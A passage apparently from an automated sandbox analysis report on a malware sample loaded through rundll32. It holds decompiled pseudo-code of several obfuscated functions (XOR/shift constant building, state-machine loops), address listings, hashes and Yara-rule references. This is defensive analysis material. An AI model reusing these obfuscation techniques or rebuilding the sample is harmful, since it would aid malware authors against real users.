						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                          0x007aa2e8
                                                                                                                          0x007aa2e8
                                                                                                                          0x007aa2ef
                                                                                                                          0x007aa2f3
                                                                                                                          0x007aa2f7
                                                                                                                          0x007aa2ff
                                                                                                                          0x007aa304
                                                                                                                          0x007aa30c
                                                                                                                          0x007aa314
                                                                                                                          0x007aa31c
                                                                                                                          0x007aa321
                                                                                                                          0x007aa329
                                                                                                                          0x007aa331
                                                                                                                          0x007aa339
                                                                                                                          0x007aa342
                                                                                                                          0x007aa34b
                                                                                                                          0x007aa350
                                                                                                                          0x007aa355
                                                                                                                          0x007aa35b
                                                                                                                          0x007aa363
                                                                                                                          0x007aa36b
                                                                                                                          0x007aa373
                                                                                                                          0x007aa378
                                                                                                                          0x007aa37d
                                                                                                                          0x007aa385
                                                                                                                          0x007aa38d
                                                                                                                          0x007aa395
                                                                                                                          0x007aa39d
                                                                                                                          0x007aa3a5
                                                                                                                          0x007aa3b1
                                                                                                                          0x007aa3b6
                                                                                                                          0x007aa3bc
                                                                                                                          0x007aa3c4
                                                                                                                          0x007aa3cc
                                                                                                                          0x007aa3d8
                                                                                                                          0x007aa3db
                                                                                                                          0x007aa3df
                                                                                                                          0x007aa3e7
                                                                                                                          0x007aa3f4
                                                                                                                          0x007aa3f8
                                                                                                                          0x007aa400
                                                                                                                          0x007aa408
                                                                                                                          0x007aa410
                                                                                                                          0x007aa418
                                                                                                                          0x007aa420
                                                                                                                          0x007aa428
                                                                                                                          0x007aa430
                                                                                                                          0x007aa438
                                                                                                                          0x007aa440
                                                                                                                          0x007aa448
                                                                                                                          0x007aa450
                                                                                                                          0x007aa45d
                                                                                                                          0x007aa461
                                                                                                                          0x007aa469
                                                                                                                          0x007aa471
                                                                                                                          0x007aa479
                                                                                                                          0x007aa481
                                                                                                                          0x007aa486
                                                                                                                          0x007aa48e
                                                                                                                          0x007aa49b
                                                                                                                          0x007aa49f
                                                                                                                          0x007aa4a7
                                                                                                                          0x007aa4af
                                                                                                                          0x007aa4b7
                                                                                                                          0x007aa4bf
                                                                                                                          0x007aa4c7
                                                                                                                          0x007aa4cf
                                                                                                                          0x007aa4d3
                                                                                                                          0x007aa4d7
                                                                                                                          0x007aa4df
                                                                                                                          0x007aa4e7
                                                                                                                          0x007aa4ef
                                                                                                                          0x007aa4f4
                                                                                                                          0x007aa4f9
                                                                                                                          0x007aa501
                                                                                                                          0x007aa509
                                                                                                                          0x007aa511
                                                                                                                          0x00000000
                                                                                                                          0x007aa519
                                                                                                                          0x007aa519
                                                                                                                          0x007aa519
                                                                                                                          0x007aa52b
                                                                                                                          0x007aa559
                                                                                                                          0x007aa55b
                                                                                                                          0x007aa55e
                                                                                                                          0x007aa564
                                                                                                                          0x007aa63c
                                                                                                                          0x007aa645
                                                                                                                          0x007aa56a
                                                                                                                          0x007aa56a
                                                                                                                          0x007aa570
                                                                                                                          0x007aa638
                                                                                                                          0x007aa63a
                                                                                                                          0x007aa651
                                                                                                                          0x007aa657
                                                                                                                          0x007aa659
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa576
                                                                                                                          0x007aa576
                                                                                                                          0x007aa57a
                                                                                                                          0x007aa57c
                                                                                                                          0x007aa5df
                                                                                                                          0x007aa5df
                                                                                                                          0x007aa5e3
                                                                                                                          0x007aa5e3
                                                                                                                          0x007aa5e7
                                                                                                                          0x00000000
                                                                                                                          0x007aa57e
                                                                                                                          0x007aa582
                                                                                                                          0x007aa58f
                                                                                                                          0x007aa590
                                                                                                                          0x007aa591
                                                                                                                          0x007aa595
                                                                                                                          0x007aa59a
                                                                                                                          0x007aa5a2
                                                                                                                          0x00000000
                                                                                                                          0x007aa5a8
                                                                                                                          0x007aa5b4
                                                                                                                          0x007aa5c2
                                                                                                                          0x007aa5c7
                                                                                                                          0x007aa5cb
                                                                                                                          0x007aa5cd
                                                                                                                          0x007aa5d0
                                                                                                                          0x007aa5d3
                                                                                                                          0x007aa5d7
                                                                                                                          0x007aa5dd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa5dd
                                                                                                                          0x007aa5a2
                                                                                                                          0x007aa57c
                                                                                                                          0x007aa570
                                                                                                                          0x007aa52d
                                                                                                                          0x007aa533
                                                                                                                          0x00000000
                                                                                                                          0x007aa539
                                                                                                                          0x007aa539
                                                                                                                          0x00000000
                                                                                                                          0x007aa539
                                                                                                                          0x007aa533
                                                                                                                          0x007aa65d
                                                                                                                          0x007aa665
                                                                                                                          0x007aa665
                                                                                                                          0x007aa5f5
                                                                                                                          0x007aa604
                                                                                                                          0x007aa605
                                                                                                                          0x007aa606
                                                                                                                          0x007aa60b
                                                                                                                          0x007aa611
                                                                                                                          0x007aa61b
                                                                                                                          0x007aa61f
                                                                                                                          0x00000000
                                                                                                                          0x007aa613
                                                                                                                          0x007aa613
                                                                                                                          0x007aa617
                                                                                                                          0x00000000
                                                                                                                          0x007aa617
                                                                                                                          0x00000000
                                                                                                                          0x007aa624
                                                                                                                          0x007aa624
                                                                                                                          0x007aa628
                                                                                                                          0x007aa634
                                                                                                                          0x00000000
                                                                                                                          0x007aa634

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !J$YIa$mU$s
                                                                                                                          • API String ID: 0-3335770892
                                                                                                                          • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                          • Instruction ID: 7f03a4da932603fbbeb5d34701a58e5834a5430420da23b026d70951c4a7a94b
                                                                                                                          • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                          • Instruction Fuzzy Hash: 92914FB1909340ABC358DF29C18980BFBF1BBC5758F544A1EF99597220D3B8DA08CB87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00794EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00794EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x7b3e10; // 0x0
				_t203 = E0079B6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E0079B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E007ADCF7(_v56, 0x791000, _t248);
					_pop(_t221);
					E007947CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E0079A8B0(_v60, _t207, _v76);
					E007A1F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                          0x00794eec
                                                                                                                          0x00794ef2
                                                                                                                          0x00794ef9
                                                                                                                          0x00794f00
                                                                                                                          0x00794f04
                                                                                                                          0x00794f08
                                                                                                                          0x00794f0c
                                                                                                                          0x00794f13
                                                                                                                          0x00794f1a
                                                                                                                          0x00794f21
                                                                                                                          0x00794f28
                                                                                                                          0x00794f2c
                                                                                                                          0x00794f33
                                                                                                                          0x00794f3a
                                                                                                                          0x00794f41
                                                                                                                          0x00794f45
                                                                                                                          0x00794f4c
                                                                                                                          0x00794f53
                                                                                                                          0x00794f5a
                                                                                                                          0x00794f67
                                                                                                                          0x00794f6c
                                                                                                                          0x00794f71
                                                                                                                          0x00794f78
                                                                                                                          0x00794f83
                                                                                                                          0x00794f86
                                                                                                                          0x00794f89
                                                                                                                          0x00794f90
                                                                                                                          0x00794f97
                                                                                                                          0x00794fa5
                                                                                                                          0x00794fa8
                                                                                                                          0x00794fac
                                                                                                                          0x00794fb3
                                                                                                                          0x00794fba
                                                                                                                          0x00794fc1
                                                                                                                          0x00794fc8
                                                                                                                          0x00794fcf
                                                                                                                          0x00794fd6
                                                                                                                          0x00794fde
                                                                                                                          0x00794fdf
                                                                                                                          0x00794fe2
                                                                                                                          0x00794fe9
                                                                                                                          0x00794ff0
                                                                                                                          0x00794ff7
                                                                                                                          0x00794ffe
                                                                                                                          0x00795002
                                                                                                                          0x00795009
                                                                                                                          0x00795010
                                                                                                                          0x00795017
                                                                                                                          0x0079501b
                                                                                                                          0x00795022
                                                                                                                          0x00795029
                                                                                                                          0x0079502d
                                                                                                                          0x00795039
                                                                                                                          0x0079503c
                                                                                                                          0x00795043
                                                                                                                          0x0079504a
                                                                                                                          0x00795051
                                                                                                                          0x00795055
                                                                                                                          0x0079505c
                                                                                                                          0x00795063
                                                                                                                          0x0079506a
                                                                                                                          0x0079506e
                                                                                                                          0x00795072
                                                                                                                          0x00795076
                                                                                                                          0x0079507d
                                                                                                                          0x00795084
                                                                                                                          0x0079508b
                                                                                                                          0x00795094
                                                                                                                          0x00795098
                                                                                                                          0x0079509f
                                                                                                                          0x007950a6
                                                                                                                          0x007950ad
                                                                                                                          0x007950b4
                                                                                                                          0x007950bb
                                                                                                                          0x007950c8
                                                                                                                          0x007950c9
                                                                                                                          0x007950cc
                                                                                                                          0x007950d3
                                                                                                                          0x007950da
                                                                                                                          0x007950de
                                                                                                                          0x007950e5
                                                                                                                          0x007950ec
                                                                                                                          0x007950f0
                                                                                                                          0x007950f4
                                                                                                                          0x007950fb
                                                                                                                          0x00795102
                                                                                                                          0x0079510e
                                                                                                                          0x00795111
                                                                                                                          0x00795115
                                                                                                                          0x00795122
                                                                                                                          0x0079512e
                                                                                                                          0x0079513a
                                                                                                                          0x00795147
                                                                                                                          0x0079514f
                                                                                                                          0x00795151
                                                                                                                          0x00795154
                                                                                                                          0x0079515c
                                                                                                                          0x00795162
                                                                                                                          0x0079516d
                                                                                                                          0x00795189
                                                                                                                          0x00795196
                                                                                                                          0x007951a8
                                                                                                                          0x007951b0
                                                                                                                          0x007951b8

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID: *X&R$0M*$7m_$@!x
                                                                                                                          • API String ID: 1586166983-4050865940
                                                                                                                          • Opcode ID: 004f44d492d65939a2fe3af0e0bed4976815fb60795ccefe6be6e8f8bd2ecbc4
                                                                                                                          • Instruction ID: 4588d53a0c350ef3d211b8924f79aaf33789307a9b3f3a2421e7ddc7562bb4b8
                                                                                                                          • Opcode Fuzzy Hash: 004f44d492d65939a2fe3af0e0bed4976815fb60795ccefe6be6e8f8bd2ecbc4
                                                                                                                          • Instruction Fuzzy Hash: 88811371C0121DEFCF49DFA1D88A8EEBBB1FB44718F208118E511B6260D7B55A4ACF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079EA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E0079EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E00798F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E007919B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E007A1E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                          0x0079eaa0
                                                                                                                          0x0079eaa4
                                                                                                                          0x0079eaa6
                                                                                                                          0x0079eaaa
                                                                                                                          0x0079eaae
                                                                                                                          0x0079eab2
                                                                                                                          0x0079eab3
                                                                                                                          0x0079eab4
                                                                                                                          0x0079eab9
                                                                                                                          0x0079eac1
                                                                                                                          0x0079eacb
                                                                                                                          0x0079eacd
                                                                                                                          0x0079ead4
                                                                                                                          0x0079ead5
                                                                                                                          0x0079ead9
                                                                                                                          0x0079eae1
                                                                                                                          0x0079eae9
                                                                                                                          0x0079eaf1
                                                                                                                          0x0079eaf9
                                                                                                                          0x0079eb01
                                                                                                                          0x0079eb09
                                                                                                                          0x0079eb11
                                                                                                                          0x0079eb19
                                                                                                                          0x0079eb21
                                                                                                                          0x0079eb29
                                                                                                                          0x0079eb37
                                                                                                                          0x0079eb3b
                                                                                                                          0x0079eb43
                                                                                                                          0x0079eb4b
                                                                                                                          0x0079eb53
                                                                                                                          0x0079eb5b
                                                                                                                          0x0079eb63
                                                                                                                          0x0079eb67
                                                                                                                          0x0079eb6f
                                                                                                                          0x0079eb77
                                                                                                                          0x0079eb7f
                                                                                                                          0x0079eb84
                                                                                                                          0x0079eb89
                                                                                                                          0x0079eb91
                                                                                                                          0x0079eb99
                                                                                                                          0x0079eba1
                                                                                                                          0x0079eba9
                                                                                                                          0x0079ebb1
                                                                                                                          0x0079ebb9
                                                                                                                          0x0079ebc1
                                                                                                                          0x0079ebc9
                                                                                                                          0x0079ebd1
                                                                                                                          0x0079ebd9
                                                                                                                          0x0079ebe6
                                                                                                                          0x0079ebea
                                                                                                                          0x0079ebf2
                                                                                                                          0x0079ebff
                                                                                                                          0x0079ec03
                                                                                                                          0x0079ec0b
                                                                                                                          0x0079ec13
                                                                                                                          0x0079ec1b
                                                                                                                          0x0079ec20
                                                                                                                          0x0079ec28
                                                                                                                          0x0079ec30
                                                                                                                          0x0079ec38
                                                                                                                          0x0079ec40
                                                                                                                          0x0079ec48
                                                                                                                          0x0079ec50
                                                                                                                          0x0079ec58
                                                                                                                          0x0079ec60
                                                                                                                          0x0079ec68
                                                                                                                          0x0079ec75
                                                                                                                          0x0079ec79
                                                                                                                          0x0079ec81
                                                                                                                          0x0079ec92
                                                                                                                          0x0079ec98
                                                                                                                          0x0079eca2
                                                                                                                          0x0079eca6
                                                                                                                          0x0079ecaa
                                                                                                                          0x0079ecb2
                                                                                                                          0x0079ecb2
                                                                                                                          0x0079ecc0
                                                                                                                          0x0079ed52
                                                                                                                          0x0079ed57
                                                                                                                          0x0079ed59
                                                                                                                          0x0079ed5f
                                                                                                                          0x0079ed61
                                                                                                                          0x00000000
                                                                                                                          0x0079ed61
                                                                                                                          0x0079ecc2
                                                                                                                          0x0079ecc8
                                                                                                                          0x0079ed16
                                                                                                                          0x0079ed1b
                                                                                                                          0x0079ed1e
                                                                                                                          0x0079ed20
                                                                                                                          0x00000000
                                                                                                                          0x0079ecca
                                                                                                                          0x0079ecd0
                                                                                                                          0x00000000
                                                                                                                          0x0079ecd6
                                                                                                                          0x0079ece7
                                                                                                                          0x0079ecec
                                                                                                                          0x0079ecd0
                                                                                                                          0x0079ecc8
                                                                                                                          0x0079ecef
                                                                                                                          0x0079ecf8
                                                                                                                          0x0079ecf8
                                                                                                                          0x0079ed6b
                                                                                                                          0x0079ed6d
                                                                                                                          0x0079ed6d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -5/$WzSq$^VF$JF
                                                                                                                          • API String ID: 0-2399144359
                                                                                                                          • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                          • Instruction ID: c496705aa0fd3da244d34a4b95da25523c741fba91bd3ab81fcf0545ba043e23
                                                                                                                          • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                          • Instruction Fuzzy Hash: A97131711083419BCB58CF65D98A81BBBF2FBC9758F504A1DF29696220C3B5DA48DF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A9BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A9BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E0079B6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E00799B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E007952C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E00792051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                          0x007a9bcf
                                                                                                                          0x007a9bd9
                                                                                                                          0x007a9be3
                                                                                                                          0x007a9be8
                                                                                                                          0x007a9bed
                                                                                                                          0x007a9bf5
                                                                                                                          0x007a9bfd
                                                                                                                          0x007a9c05
                                                                                                                          0x007a9c0d
                                                                                                                          0x007a9c12
                                                                                                                          0x007a9c17
                                                                                                                          0x007a9c1f
                                                                                                                          0x007a9c27
                                                                                                                          0x007a9c2f
                                                                                                                          0x007a9c37
                                                                                                                          0x007a9c3f
                                                                                                                          0x007a9c47
                                                                                                                          0x007a9c4f
                                                                                                                          0x007a9c57
                                                                                                                          0x007a9c5f
                                                                                                                          0x007a9c67
                                                                                                                          0x007a9c6f
                                                                                                                          0x007a9c77
                                                                                                                          0x007a9c7f
                                                                                                                          0x007a9c84
                                                                                                                          0x007a9c8c
                                                                                                                          0x007a9c94
                                                                                                                          0x007a9ca1
                                                                                                                          0x007a9ca5
                                                                                                                          0x007a9ca7
                                                                                                                          0x007a9caf
                                                                                                                          0x007a9cbd
                                                                                                                          0x007a9cc0
                                                                                                                          0x007a9cc4
                                                                                                                          0x007a9cc8
